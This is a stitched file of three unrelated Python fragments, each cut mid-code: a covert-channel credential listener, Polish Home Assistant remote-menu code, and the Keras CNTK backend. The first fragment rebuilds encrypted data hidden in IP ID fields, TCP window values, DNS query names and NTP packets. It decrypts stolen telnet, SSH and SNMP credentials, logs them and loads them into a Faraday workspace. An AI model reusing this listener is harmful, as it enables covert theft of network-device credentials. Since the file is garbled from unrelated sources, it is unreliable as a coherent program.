elif pkt[IP].id >= 300 and pkt[IP].id < 400:
self.pkttotal = pkt[IP].id - 300
elif pkt[IP].id >= 500 and pkt[IP].id < 600:
self.dic[pkt[IP].id - 500] = pkt[Raw].load[28:]
elif pkt[IP].id == 666:
if DEBUG:
print(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime())
+ 'TRACE:' + pkt[IP].src + ':ALARM Case Open!')
if len(self.dic) == self.pkttotal:
odic = collections.OrderedDict(sorted(self.dic.items()))
final = ''
for value in odic.iteritems():
final = final + value[1]
text = decrypt(final[:self.pktlen])
text = text.strip()
hexip = text.split(',')[-1]
text = text.replace(hexip, hextoip(hexip))
text = 'TRACE:' + pkt[IP].src + ':' + text
printer(self.filed, text)
self.dic = {}
self.pkttotal = 200
def run(self):
while not self.stoprequest.isSet():
sniff(iface=self.iface, prn=self.pkt_callback, store=0,
filter="(udp and dst portrange 33434-35000) and (not src port 53)")
def killer(self):
"""
stop Thread
"""
self.stoprequest.set()
class DNSHandler(threading.Thread):
"""
Class to observe DNS packets
and decrypt credentials
"""
def __init__(self, iface, fd, ccname):
threading.Thread.__init__(self)
self.stoprequest = threading.Event()
self.iface = iface
self.filed = fd
self.ccname = ccname
def pkt_callback(self, pkt):
"""
Proccess DNS packets
"""
if self.ccname in pkt[DNS].qd.qname:
if pkt[DNS].qd.qname == '666.' + self.ccname + '.':
print(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime())
+ 'DNS/PDNS:' + pkt[IP].src + ':ALARM Case Open!')
else:
text = decrypt(pkt[DNS].qd.qname.split('.')[0])
text = text.strip()
hexip = text.split(',')[-1]
text = text.replace(hexip, hextoip(hexip))
if pkt[DNS].qd.qtype == 2:
text = 'DNS:' + pkt[IP].src + ':' + text
else:
text = 'PDNS:' + pkt[IP].src + ':' + text
printer(self.filed, text)
def run(self):
while not self.stoprequest.isSet():
sniff(iface=self.iface, prn=self.pkt_callback, store=0,
filter="udp and dst port 53")
def killer(self):
"""
stop Thread
"""
self.stoprequest.set()
class HTTPHandler(threading.Thread):
"""
Class to observe HTTP packets (TCP port 80)
and decrypt credentials
"""
def __init__(self, iface, fd):
threading.Thread.__init__(self)
self.stoprequest = threading.Event()
self.iface = iface
self.filed = fd
self.dic = {}
self.pkttotal = 200
self.pktlen = 0
def pkt_callback(self, pkt):
"""
Proccess HTTP packets (direct)
"""
if pkt[IP].id >= 200 and pkt[IP].id < 300:
self.pktlen = pkt[IP].id - 200
elif pkt[IP].id >= 300 and pkt[IP].id < 400:
self.pkttotal = pkt[IP].id - 300
elif pkt[IP].id >= 500 and pkt[IP].id < 600:
self.dic[pkt[IP].id - 500] = '{:04x}'.format(pkt[TCP].window)
elif pkt[IP].id == 666:
print(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime())
+ 'HTTP:' + pkt[IP].src + ':ALARM Case Open!')
if len(self.dic) == self.pkttotal:
odic = collections.OrderedDict(sorted(self.dic.items()))
final = ''
for value in odic.iteritems():
final = final + value[1]
text = decrypt(final[:self.pktlen])
text = text.strip()
hexip = text.split(',')[-1]
text = text.replace(hexip, hextoip(hexip))
text = 'HTTP:' + pkt[IP].src + ':' + text
printer(self.filed, text)
self.dic = {}
self.pkttotal = 200
def run(self):
while not self.stoprequest.isSet():
sniff(iface=self.iface, prn=self.pkt_callback, store=0,
filter="tcp and dst port 80")
def killer(self):
"""
stop Thread
"""
self.stoprequest.set()
class HTTPSHandler(threading.Thread):
"""
Class to observe HTTPS packets (TCP port 443)
and decrypt credentials
"""
def __init__(self, iface, fd):
threading.Thread.__init__(self)
self.stoprequest = threading.Event()
self.iface = iface
self.filed = fd
self.dic = {}
self.pkttotal = 200
self.pktlen = 0
def pkt_callback(self, pkt):
"""
Proccess HTTPS packets
"""
if pkt[IP].id >= 200 and pkt[IP].id < 300:
self.pktlen = pkt[IP].id - 200
elif pkt[IP].id >= 300 and pkt[IP].id < 400:
self.pkttotal = pkt[IP].id - 300
elif pkt[IP].id >= 500 and pkt[IP].id < 600:
self.dic[pkt[IP].id - 500] = '{:04x}'.format(pkt[TCP].window)
elif pkt[IP].id == 666:
print(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime())
+ 'HTTPS:' + pkt[IP].src + ':ALARM Case Open!')
if len(self.dic) == self.pkttotal:
odic = collections.OrderedDict(sorted(self.dic.items()))
final = ''
for value in odic.iteritems():
final = final + value[1]
text = decrypt(final[:self.pktlen])
text = text.strip()
hexip = text.split(',')[-1]
text = text.replace(hexip, hextoip(hexip))
text = 'HTTPS:' + pkt[IP].src + ':' + text
printer(self.filed, text)
self.dic = {}
self.pkttotal = 200
def run(self):
while not self.stoprequest.isSet():
sniff(iface=self.iface, prn=self.pkt_callback, store=0,
filter="tcp and dst port 443")
def killer(self):
"""
stop Thread
"""
self.stoprequest.set()
class NTPHandler(threading.Thread):
"""
Class to observe NTP packets
and decrypt credentials
"""
def __init__(self, iface, fd):
threading.Thread.__init__(self)
self.stoprequest = threading.Event()
self.iface = iface
self.filed = fd
self.dic = {}
self.pkttotal = 200
self.pktlen = 0
self.ssocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.ssocket.bind(('0.0.0.0', 123))
def run(self):
while not self.stoprequest.isSet():
buf, address = self.ssocket.recvfrom(200)
if buf:
buflen = len(buf)
full = buf[buflen-48:buflen].encode('hex')
if full[2:4] == '10':
self.pkttotal = int(full[4:6], 16)
self.pktlen = int(full[6:8], 16)
elif full[2:4] == '00':
self.dic[int(full[4:6], 16)] = full[88:96]
elif full[2:4] == '99':
print(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime())
+ 'NTP:' + address[0] + ':ALARM Case Open!')
if len(self.dic) == self.pkttotal:
odic = collections.OrderedDict(sorted(self.dic.items()))
final = ''
for value in odic.iteritems():
final = final + value[1]
text = decrypt(final[:self.pktlen])
text = text.strip()
hexip = text.split(',')[-1]
text = text.replace(hexip, hextoip(hexip))
text = 'NTP:' + address[0] + ':' + text
printer(self.filed, text)
self.dic = {}
self.pkttotal = 200
self.pktlen = 0
buf = ''
def killer(self):
"""
stop Thread
"""
self.stoprequest.set()
# Define Funtions
def decrypt(ciphertxt):
"""
Decrypt credentails
"""
hashed = pyscrypt.hash(PHRASE, SALT, 1024, 1, 1, 16)
key = hashed.encode('hex')
aes = pyaes.AESModeOfOperationCTR(key)
cleartxt = aes.decrypt(ciphertxt.decode('hex'))
return cleartxt
def hextoip(ipadd):
"""
convert HEX to IP Dot format
"""
num = 2
return '.'.join([str(int(ipadd[i:i+num], 16)) for i in range(0, len(ipadd), num)])
def printer(filed, text):
"""
Add credentials to output file and Faraday
"""
if DEBUG:
print(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime()) + text)
find = re.compile('\\b' + text + '\\b')
with open(filed, 'a+') as sfile:
with open(filed, 'r') as xfile:
match = find.findall(xfile.read())
if not match:
sfile.write(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime())
+ text + '\n')
if PLUG:
faraday(text)
def faraday(txt):
"""
Push credentials into Faraday Workspace
"""
global FSESSION
srcip = txt.split(',')[-1:][0]
natip = txt.split(':')[1]
name = txt.split(':')[2].split(',')[0]
if name == 't' or name == 's':
username = txt.split(':')[2].split(',')[1]
name = name.replace('t', 'telnet').replace('s', 'ssh')
if username == 'e':
username = 'enable'
password = txt.split(':')[2].split(',')[2]
else:
name = name.replace('p', 'snmp')
username = 'N/A'
password = txt.split(':')[2].split(',')[1]
resp = FSESSION.get(FSERVER + '/_api/v2/ws/' + FWS + '/credential/')
if resp.status_code == 401:
FSESSION = flogin()
resp = FSESSION.get(FSERVER + '/_api/v2/ws/' + FWS + '/credential/')
if resp.status_code == 200:
credata = resp.json()
exist = False
for credrow in range(len(credata['rows'])):
_target = credata['rows'][credrow]['value']['target']
_name = credata['rows'][credrow]['value']['name']
_user = credata['rows'][credrow]['value']['username']
_pass = credata['rows'][credrow]['value']['password']
if _target == srcip and name == _name and username == _user and password == _pass:
exist = True
break
if not exist:
parent_id = checkhost(FSERVER, | |
focus on current menu group view
global CURR_GROUP_VIEW
global CURR_GROUP
global CURR_ENTITIE
global CURR_ENTITIE_ENTERED
global CURR_ENTITIE_POSITION
CURR_GROUP = None
CURR_ENTITIE = None
CURR_ENTITIE_ENTERED = False
CURR_ENTITIE_POSITION = None
CURR_GROUP_VIEW = get_curr_group_view()
def set_next_group_view():
# set focus on next menu group view
global CURR_GROUP_VIEW
CURR_GROUP_VIEW = get_next(GROUP_VIEWS, get_curr_group_view())
# to reset
set_curr_group_view()
def set_prev_group_view():
# set focus on prev menu group view
global CURR_GROUP_VIEW
CURR_GROUP_VIEW = get_prev(GROUP_VIEWS, get_curr_group_view())
# to reset
set_curr_group_view()
# virtual keybord
# Group views: Litery -> Wielkie litery -> Cyfry -> Znaki specjalne -> Usuwanie
def get_curr_virtual_keyboard_mode():
if CURR_VIRTUAL_KEYBOARD_MODE is None:
return VIRTUAL_KEYBOARD_MODE[0]
return CURR_VIRTUAL_KEYBOARD_MODE
def set_next_virtual_keyboard_mode():
global CURR_VIRTUAL_KEYBOARD_MODE
global CURR_VIRTUAL_KEY
CURR_VIRTUAL_KEY = None
CURR_VIRTUAL_KEYBOARD_MODE = get_next(
VIRTUAL_KEYBOARD_MODE, get_curr_virtual_keyboard_mode()
)
def set_prev_virtual_keyboard_mode():
global CURR_VIRTUAL_KEYBOARD_MODE
global CURR_VIRTUAL_KEY
CURR_VIRTUAL_KEY = None
CURR_VIRTUAL_KEYBOARD_MODE = get_prev(
VIRTUAL_KEYBOARD_MODE, get_curr_virtual_keyboard_mode()
)
def say_curr_virtual_keyboard_mode(hass):
_say_it(hass, get_curr_virtual_keyboard_mode())
def get_curr_virtual_key():
if CURR_VIRTUAL_KEY is not None:
return str(CURR_VIRTUAL_KEY)
km = get_curr_virtual_keyboard_mode()
if km == "Litery":
return VIRTUAL_KEYBOARD_LETTERS[0]
elif km == "Wielkie litery":
return VIRTUAL_KEYBOARD_LETTERS[0]
elif km == "Cyfry":
return VIRTUAL_KEYBOARD_NUMBERS[0]
elif km == "Znaki specjalne":
return VIRTUAL_KEYBOARD_SYMBOLS[0]
elif km == "Usuwanie":
return VIRTUAL_KEYBOARD_DELETE[0]
def set_next_virtual_key():
global CURR_VIRTUAL_KEY
km = get_curr_virtual_keyboard_mode()
if km == "Litery":
CURR_VIRTUAL_KEY = get_next(VIRTUAL_KEYBOARD_LETTERS, get_curr_virtual_key())
elif km == "Wielkie litery":
CURR_VIRTUAL_KEY = get_next(VIRTUAL_KEYBOARD_LETTERS, get_curr_virtual_key())
elif km == "Cyfry":
CURR_VIRTUAL_KEY = get_next(VIRTUAL_KEYBOARD_NUMBERS, get_curr_virtual_key())
elif km == "Znaki specjalne":
CURR_VIRTUAL_KEY = get_next(VIRTUAL_KEYBOARD_SYMBOLS, get_curr_virtual_key())
elif km == "Usuwanie":
CURR_VIRTUAL_KEY = get_next(VIRTUAL_KEYBOARD_DELETE, get_curr_virtual_key())
def set_prev_virtual_key():
global CURR_VIRTUAL_KEY
km = get_curr_virtual_keyboard_mode()
if km == "Litery":
CURR_VIRTUAL_KEY = get_prev(VIRTUAL_KEYBOARD_LETTERS, get_curr_virtual_key())
elif km == "Wielkie litery":
CURR_VIRTUAL_KEY = get_prev(VIRTUAL_KEYBOARD_LETTERS, get_curr_virtual_key())
elif km == "Cyfry":
CURR_VIRTUAL_KEY = get_prev(VIRTUAL_KEYBOARD_NUMBERS, get_curr_virtual_key())
elif km == "Znaki specjalne":
CURR_VIRTUAL_KEY = get_prev(VIRTUAL_KEYBOARD_SYMBOLS, get_curr_virtual_key())
elif km == "Usuwanie":
CURR_VIRTUAL_KEY = get_prev(VIRTUAL_KEYBOARD_DELETE, get_curr_virtual_key())
def say_curr_virtual_key(hass):
key = get_curr_virtual_key()
km = get_curr_virtual_keyboard_mode()
text = ""
if km == "Litery":
text = "" + key.lower()
elif km == "Wielkie litery":
text = "" + key
elif km == "Cyfry":
text = "" + key
elif km == "Znaki specjalne":
idx = VIRTUAL_KEYBOARD_SYMBOLS.index(key)
text = "" + VIRTUAL_KEYBOARD_SYMBOLS_NAMES[idx]
elif km == "Usuwanie":
text = "" + key
_say_it(hass, text)
def reset_virtual_keyboard(hass):
global CURR_VIRTUAL_KEYBOARD_MODE
global CURR_VIRTUAL_KEY
global CURR_VIRTUAL_KEYBOARD_VALUE
CURR_VIRTUAL_KEYBOARD_MODE = None
CURR_VIRTUAL_KEY = None
CURR_VIRTUAL_KEYBOARD_VALUE = None
# reset field value
hass.services.call(
"input_text", "set_value", {"entity_id": CURR_ENTITIE, "value": ""}
)
def get_hour_to_say(h, m):
from datetime import time
import babel.dates
t = time(h, m)
message = "godzina: " + babel.dates.format_time(t, format="short", locale="pl")
return message
def set_time_hour_up(hass, entity_id):
global G_INPUT_CURRENT_HOUR
global G_INPUT_CURRENT_MINNUTE
if G_INPUT_CURRENT_HOUR is None:
time_attr = hass.states.get(entity_id).attributes
G_INPUT_CURRENT_HOUR = time_attr.get("hour", 0)
G_INPUT_CURRENT_MINNUTE = time_attr.get("minute", 0)
if G_INPUT_CURRENT_HOUR == 23:
G_INPUT_CURRENT_HOUR = 0
else:
G_INPUT_CURRENT_HOUR = G_INPUT_CURRENT_HOUR + 1
_say_it(hass, get_hour_to_say(G_INPUT_CURRENT_HOUR, G_INPUT_CURRENT_MINNUTE))
def set_time_hour_down(hass, entity_id):
global G_INPUT_CURRENT_HOUR
global G_INPUT_CURRENT_MINNUTE
if G_INPUT_CURRENT_HOUR is None:
time_attr = hass.states.get(entity_id).attributes
G_INPUT_CURRENT_HOUR = time_attr.get("hour", 0)
G_INPUT_CURRENT_MINNUTE = time_attr.get("minute", 0)
if G_INPUT_CURRENT_HOUR == 0:
G_INPUT_CURRENT_HOUR = 23
else:
G_INPUT_CURRENT_HOUR = G_INPUT_CURRENT_HOUR - 1
_say_it(hass, get_hour_to_say(G_INPUT_CURRENT_HOUR, G_INPUT_CURRENT_MINNUTE))
def set_time_minute_up(hass, entity_id):
global G_INPUT_CURRENT_HOUR
global G_INPUT_CURRENT_MINNUTE
if G_INPUT_CURRENT_HOUR is None:
time_attr = hass.states.get(entity_id).attributes
G_INPUT_CURRENT_HOUR = time_attr.get("hour", 0)
G_INPUT_CURRENT_MINNUTE = time_attr.get("minute", 0)
if G_INPUT_CURRENT_MINNUTE == 59:
G_INPUT_CURRENT_MINNUTE = 0
else:
G_INPUT_CURRENT_MINNUTE = G_INPUT_CURRENT_MINNUTE + 1
_say_it(hass, get_hour_to_say(G_INPUT_CURRENT_HOUR, G_INPUT_CURRENT_MINNUTE))
def set_time_minute_down(hass, entity_id):
global G_INPUT_CURRENT_HOUR
global G_INPUT_CURRENT_MINNUTE
if G_INPUT_CURRENT_HOUR is None:
time_attr = hass.states.get(entity_id).attributes
G_INPUT_CURRENT_HOUR = time_attr.get("hour", 0)
G_INPUT_CURRENT_MINNUTE = time_attr.get("minute", 0)
if G_INPUT_CURRENT_MINNUTE == 0:
G_INPUT_CURRENT_MINNUTE = 59
else:
G_INPUT_CURRENT_MINNUTE = G_INPUT_CURRENT_MINNUTE - 1
_say_it(hass, get_hour_to_say(G_INPUT_CURRENT_HOUR, G_INPUT_CURRENT_MINNUTE))
def remove_selected_action(key_code):
global CURR_ENTITIE_SELECTED_ACTION
if key_code not in (19, 20, 21, 22, 23):
CURR_ENTITIE_SELECTED_ACTION = None
return
if (
CURR_ENTITIE_SELECTED_ACTION == ais_global.G_ACTION_SET_AUDIO_SHUFFLE
and key_code not in (19, 20, 23)
):
CURR_ENTITIE_SELECTED_ACTION = None
return
# Groups in Groups views
def get_curr_group():
global CURR_GROUP
if CURR_GROUP is None:
# take the first one from Group view
for group in GROUP_ENTITIES:
if group["remote_group_view"] == get_curr_group_view():
CURR_GROUP = group
break
return CURR_GROUP
def get_group_from_group(entity_id):
global CURR_GROUP
for group in GROUP_ENTITIES:
if group["entity_id"] == entity_id:
CURR_GROUP = group
break
return CURR_GROUP
def get_curr_group_idx():
idx = 0
for group in GROUP_ENTITIES:
if group["entity_id"] == get_curr_group()["entity_id"]:
return idx
idx += 1
return idx
def say_curr_group(hass):
_say_it(hass, get_curr_group()["friendly_name"])
def set_bookmarks_curr_group(hass):
for idx, g in enumerate(GROUP_ENTITIES, start=0):
if g["entity_id"] == "group.ais_bookmarks":
set_curr_group(hass, g)
return
def set_favorites_curr_group(hass):
for idx, g in enumerate(GROUP_ENTITIES, start=0):
if g["entity_id"] == "group.ais_favorites":
set_curr_group(hass, g)
return
def set_curr_group(hass, group):
# set focus on current menu group view
global CURR_GROUP_VIEW
global CURR_GROUP
global CURR_ENTITIE
global CURR_ENTITIE_ENTERED
global CURR_ENTITIE_POSITION
# the entitie can be selected or focused
CURR_ENTITIE = None
CURR_ENTITIE_ENTERED = False
CURR_ENTITIE_POSITION = None
if group is None:
CURR_GROUP = get_curr_group()
hass.states.async_set("binary_sensor.selected_entity", CURR_GROUP["entity_id"])
else:
CURR_GROUP_VIEW = group["remote_group_view"]
CURR_GROUP = group
# set display context for mega audio player
if CURR_GROUP["entity_id"] in (
"group.radio_player",
"group.podcast_player",
"group.music_player",
"group.ais_bookmarks",
"group.ais_rss_news_remote",
"group.local_audio",
"sensor.ais_drives",
"group.ais_favorites",
"group.audiobooks_player",
):
hass.states.async_set(
"sensor.ais_player_mode", CURR_GROUP["entity_id"].replace("group.", "")
)
def set_next_group(hass):
# set focus on next group in focused view
global CURR_GROUP
first_group_in_view = None
curr_group_in_view = None
next_group_in_view = None
for group in GROUP_ENTITIES:
if group["remote_group_view"] == get_curr_group_view():
# select the first group
if curr_group_in_view is not None and next_group_in_view is None:
next_group_in_view = group
if first_group_in_view is None:
first_group_in_view = group
if CURR_GROUP["entity_id"] == group["entity_id"]:
curr_group_in_view = group
if next_group_in_view is not None:
CURR_GROUP = next_group_in_view
else:
CURR_GROUP = first_group_in_view
# to reset
set_curr_group(hass, CURR_GROUP)
def set_prev_group(hass):
# set focus on prev group in focused view
global CURR_GROUP
last_group_in_view = None
curr_group_in_view = None
prev_group_in_view = None
for group in GROUP_ENTITIES:
if group["remote_group_view"] == get_curr_group_view():
# select the last group
last_group_in_view = group
if CURR_GROUP["entity_id"] == group["entity_id"]:
curr_group_in_view = group
if curr_group_in_view is None:
prev_group_in_view = group
if prev_group_in_view is not None:
CURR_GROUP = prev_group_in_view
else:
CURR_GROUP = last_group_in_view
# to reset
set_curr_group(hass, CURR_GROUP)
# entity in group
def get_curr_entity():
global CURR_ENTITIE
if CURR_ENTITIE is None:
if len(GROUP_ENTITIES[get_curr_group_idx()]["entities"]) > 0:
CURR_ENTITIE = GROUP_ENTITIES[get_curr_group_idx()]["entities"][0]
return CURR_ENTITIE
def get_curr_entity_idx():
idx = 0
for item in GROUP_ENTITIES[get_curr_group_idx()]["entities"]:
if item == get_curr_entity():
return idx
idx += 1
def set_curr_entity(hass, entity):
# set focus on current entity
global CURR_ENTITIE
global CURR_ENTITIE_POSITION
if entity is None:
CURR_ENTITIE = get_curr_entity()
else:
CURR_ENTITIE = entity
CURR_ENTITIE_POSITION = None
hass.states.async_set("binary_sensor.selected_entity", CURR_ENTITIE)
def set_next_entity(hass):
# set next entity
global CURR_ENTITIE
# special case for music
if CURR_ENTITIE == "input_select.ais_music_service":
state = hass.states.get("input_select.ais_music_service")
if state.state == "Spotify":
CURR_ENTITIE = "input_text.ais_spotify_query"
else:
CURR_ENTITIE = "input_text.ais_music_query"
elif CURR_ENTITIE == "input_text.ais_music_query":
CURR_ENTITIE = "sensor.youtubelist"
elif CURR_ENTITIE == "input_text.ais_spotify_query":
CURR_ENTITIE = "sensor.spotifysearchlist"
elif CURR_ENTITIE == "sensor.youtubelist":
CURR_ENTITIE = "input_select.ais_music_service"
elif CURR_ENTITIE == "sensor.spotifysearchlist":
CURR_ENTITIE = "sensor.spotifylist"
elif CURR_ENTITIE == "sensor.spotifylist":
CURR_ENTITIE = "input_select.ais_music_service"
else:
entity_idx = get_curr_entity_idx()
group_idx = get_curr_group_idx()
l_group_len = len(GROUP_ENTITIES[group_idx]["entities"])
if entity_idx + 1 == l_group_len:
entity_idx = 0
else:
entity_idx = entity_idx + 1
CURR_ENTITIE = GROUP_ENTITIES[group_idx]["entities"][entity_idx]
# to reset variables
set_curr_entity(hass, None)
say_curr_entity(hass)
def set_prev_entity(hass):
# set prev entity
global CURR_ENTITIE
# special case for music
if CURR_ENTITIE == "input_select.ais_music_service":
state = hass.states.get("input_select.ais_music_service")
if state.state == "Spotify":
CURR_ENTITIE = "sensor.spotifylist"
else:
CURR_ENTITIE = "sensor.youtubelist"
elif CURR_ENTITIE == "sensor.youtubelist":
CURR_ENTITIE = "input_text.ais_music_query"
elif CURR_ENTITIE == "input_text.ais_music_query":
CURR_ENTITIE = "input_select.ais_music_service"
elif CURR_ENTITIE == "sensor.spotifylist":
CURR_ENTITIE = "sensor.spotifysearchlist"
elif CURR_ENTITIE == "sensor.spotifysearchlist":
CURR_ENTITIE = "input_text.ais_spotify_query"
elif CURR_ENTITIE == "input_text.ais_spotify_query":
CURR_ENTITIE = "input_select.ais_music_service"
# end special case for music
else:
idx = get_curr_entity_idx()
l_group_len = len(GROUP_ENTITIES[get_curr_group_idx()]["entities"])
if idx == 0:
idx = l_group_len - 1
else:
idx = idx - 1
CURR_ENTITIE = GROUP_ENTITIES[get_curr_group_idx()]["entities"][idx]
# to reset variables
set_curr_entity(hass, None)
say_curr_entity(hass)
def say_curr_entity(hass):
# check if we have selected item
entity_id = get_curr_entity()
if entity_id is None:
if CURR_GROUP["entity_id"] == "group.all_ais_persons":
_say_it(
hass,
"Brak informacji o osobach. W konfiguracji możesz dodać osoby, "
"oraz urządzenia raportujące lokalizację osób.",
)
elif CURR_GROUP["entity_id"] == "group.all_automations":
_say_it(
hass,
"Brak zdefiniowanych automatyzacji. Dodaj automatyzację w konfiguracji.",
)
else:
_say_it(hass, "Brak pozycji")
return
state = hass.states.get(entity_id)
if state is None:
_say_it(hass, "Brak pozycji")
return
text = state.attributes.get("text")
info_name = state.attributes.get("friendly_name")
info_data = state.state
info_unit = state.attributes.get("unit_of_measurement")
if not text:
text = ""
# handle special cases...
if entity_id == "sensor.aisknowledgeanswer":
_say_it(hass, "Odpowiedź: " + text)
return
elif entity_id == "sensor.ais_drives":
state = hass.states.get("sensor.ais_drives")
if state.state is None or state.state == "":
_say_it(hass, "dysk wewnętrzny")
else:
attr = state.attributes
files = attr.get("files", [])
info = ais_drives_service.get_pozycji_variety(len(files))
_say_it(hass, info)
return
elif | |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cntk as C
import numpy as np
from .common import floatx, epsilon, image_dim_ordering, image_data_format
from collections import defaultdict
from contextlib import contextmanager
import warnings
C.set_global_option('align_axis', 1)
b_any = any
dev = C.device.use_default_device()
if dev.type() == 0:
warnings.warn(
'CNTK backend warning: GPU is not detected. '
'CNTK\'s CPU version is not fully optimized,'
'please run with GPU to get better performance.')
# A learning phase is a bool tensor used to run Keras models in
# either train mode (learning_phase == 1) or test mode (learning_phase == 0).
# LEARNING_PHASE_PLACEHOLDER is the placeholder for dynamic learning phase
_LEARNING_PHASE_PLACEHOLDER = C.constant(shape=(), dtype=np.float32, value=1.0, name='_keras_learning_phase')
# static learning phase flag, if it is not 0 or 1, we will go with dynamic learning phase tensor.
_LEARNING_PHASE = -1
_UID_PREFIXES = defaultdict(int)
# cntk doesn't support gradient as symbolic op, to hook up with keras model,
# we will create gradient as a constant placeholder, here use this global
# map to keep the mapping from grad placeholder to parameter
grad_parameter_dict = {}
NAME_SCOPE_STACK = []
@contextmanager
def name_scope(name):
global NAME_SCOPE_STACK
NAME_SCOPE_STACK.append(name)
yield
NAME_SCOPE_STACK.pop()
def get_uid(prefix=''):
_UID_PREFIXES[prefix] += 1
return _UID_PREFIXES[prefix]
def learning_phase():
# If _LEARNING_PHASE is not 0 or 1, return dynamic learning phase tensor
return _LEARNING_PHASE if _LEARNING_PHASE in {0, 1} else _LEARNING_PHASE_PLACEHOLDER
def set_learning_phase(value):
global _LEARNING_PHASE
if value not in {0, 1}:
raise ValueError('CNTK Backend: Set learning phase '
'with value %s is not supported, '
'expected 0 or 1.' % value)
_LEARNING_PHASE = value
def clear_session():
"""Reset learning phase flag for cntk backend.
"""
global _LEARNING_PHASE
global _LEARNING_PHASE_PLACEHOLDER
_LEARNING_PHASE = -1
_LEARNING_PHASE_PLACEHOLDER.value = np.asarray(1.0)
def in_train_phase(x, alt, training=None):
global _LEARNING_PHASE
if training is None:
training = learning_phase()
uses_learning_phase = True
else:
uses_learning_phase = False
# CNTK currently don't support cond op, so here we use
# element_select approach as workaround. It may have
# perf issue, will resolve it later with cntk cond op.
if callable(x) and isinstance(x, C.cntk_py.Function) is False:
x = x()
if callable(alt) and isinstance(alt, C.cntk_py.Function) is False:
alt = alt()
if training is True:
x._uses_learning_phase = uses_learning_phase
return x
else:
# if _LEARNING_PHASE is static
if isinstance(training, int) or isinstance(training, bool):
result = x if training == 1 or training is True else alt
else:
result = C.element_select(training, x, alt)
result._uses_learning_phase = uses_learning_phase
return result
def in_test_phase(x, alt, training=None):
return in_train_phase(alt, x, training=training)
def _convert_string_dtype(dtype):
# cntk only support float32 and float64
if dtype == 'float32':
return np.float32
elif dtype == 'float64':
return np.float64
else:
# cntk only running with float,
# try to cast to float to run the model
return np.float32
def _convert_dtype_string(dtype):
if dtype == np.float32:
return 'float32'
elif dtype == np.float64:
return 'float64'
else:
raise ValueError('CNTK Backend: Unsupported dtype: %s. '
'CNTK only supports float32 and '
'float64.' % dtype)
def variable(value, dtype=None, name=None, constraint=None):
"""Instantiates a variable and returns it.
# Arguments
value: Numpy array, initial value of the tensor.
dtype: Tensor type.
name: Optional name string for the tensor.
constraint: Optional projection function to be
applied to the variable after an optimizer update.
# Returns
A variable instance (with Keras metadata included).
"""
if dtype is None:
dtype = floatx()
if name is None:
name = ''
if isinstance(
value,
C.variables.Constant) or isinstance(
value,
C.variables.Parameter):
value = value.value
# we don't support init parameter with symbolic op, so eval it first as
# workaround
if isinstance(value, C.cntk_py.Function):
value = eval(value)
shape = value.shape if hasattr(value, 'shape') else ()
if hasattr(value, 'dtype') and value.dtype != dtype and len(shape) > 0:
value = value.astype(dtype)
# TODO: remove the conversion when cntk supports int32, int64
# https://docs.microsoft.com/en-us/python/api/cntk.variables.parameter
dtype = 'float32' if 'int' in str(dtype) else dtype
v = C.parameter(shape=shape,
init=value,
dtype=dtype,
name=_prepare_name(name, 'variable'))
v._keras_shape = v.shape
v._uses_learning_phase = False
v.constraint = constraint
return v
def bias_add(x, bias, data_format=None):
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format ' + str(data_format))
dims = len(x.shape)
if dims > 0 and x.shape[0] == C.InferredDimension:
dims -= 1
bias_dims = len(bias.shape)
if bias_dims != 1 and bias_dims != dims:
raise ValueError('Unexpected bias dimensions %d, '
'expected 1 or %d dimensions' % (bias_dims, dims))
if dims == 4:
if data_format == 'channels_first':
if bias_dims == 1:
shape = (bias.shape[0], 1, 1, 1)
else:
shape = (bias.shape[3],) + bias.shape[:3]
elif data_format == 'channels_last':
if bias_dims == 1:
shape = (1, 1, 1, bias.shape[0])
else:
shape = bias.shape
elif dims == 3:
if data_format == 'channels_first':
if bias_dims == 1:
shape = (bias.shape[0], 1, 1)
else:
shape = (bias.shape[2],) + bias.shape[:2]
elif data_format == 'channels_last':
if bias_dims == 1:
shape = (1, 1, bias.shape[0])
else:
shape = bias.shape
elif dims == 2:
if data_format == 'channels_first':
if bias_dims == 1:
shape = (bias.shape[0], 1)
else:
shape = (bias.shape[1],) + bias.shape[:1]
elif data_format == 'channels_last':
if bias_dims == 1:
shape = (1, bias.shape[0])
else:
shape = bias.shape
else:
shape = bias.shape
return x + reshape(bias, shape)
def eval(x):
if isinstance(x, C.cntk_py.Function):
return x.eval()
elif isinstance(x, C.variables.Constant) or isinstance(x, C.variables.Parameter):
return x.value
else:
raise ValueError('CNTK Backend: `eval` method on '
'`%s` type is not supported. '
'CNTK only supports `eval` with '
'`Function`, `Constant` or '
'`Parameter`.' % type(x))
def placeholder(
shape=None,
ndim=None,
dtype=None,
sparse=False,
name=None,
dynamic_axis_num=1):
if dtype is None:
dtype = floatx()
if not shape:
if ndim:
shape = tuple([None for _ in range(ndim)])
dynamic_dimension = C.FreeDimension if _get_cntk_version() >= 2.2 else C.InferredDimension
cntk_shape = [dynamic_dimension if s is None else s for s in shape]
cntk_shape = tuple(cntk_shape)
if dynamic_axis_num > len(cntk_shape):
raise ValueError('CNTK backend: creating placeholder with '
'%d dimension is not supported, at least '
'%d dimensions are needed.'
% (len(cntk_shape, dynamic_axis_num)))
if name is None:
name = ''
cntk_shape = cntk_shape[dynamic_axis_num:]
x = C.input(
shape=cntk_shape,
dtype=_convert_string_dtype(dtype),
is_sparse=sparse,
name=name)
x._keras_shape = shape
x._uses_learning_phase = False
x._cntk_placeholder = True
return x
def is_placeholder(x):
"""Returns whether `x` is a placeholder.
# Arguments
x: A candidate placeholder.
# Returns
Boolean.
"""
return hasattr(x, '_cntk_placeholder') and x._cntk_placeholder
def is_keras_tensor(x):
if not is_tensor(x):
raise ValueError('Unexpectedly found an instance of type `' +
str(type(x)) + '`. '
'Expected a symbolic tensor instance.')
return hasattr(x, '_keras_history')
def is_tensor(x):
return isinstance(x, (C.variables.Constant,
C.variables.Variable,
C.variables.Parameter,
C.ops.functions.Function))
def shape(x):
shape = list(int_shape(x))
num_dynamic = _get_dynamic_axis_num(x)
non_dyn_shape = []
for i in range(len(x.shape)):
if shape[i + num_dynamic] is None:
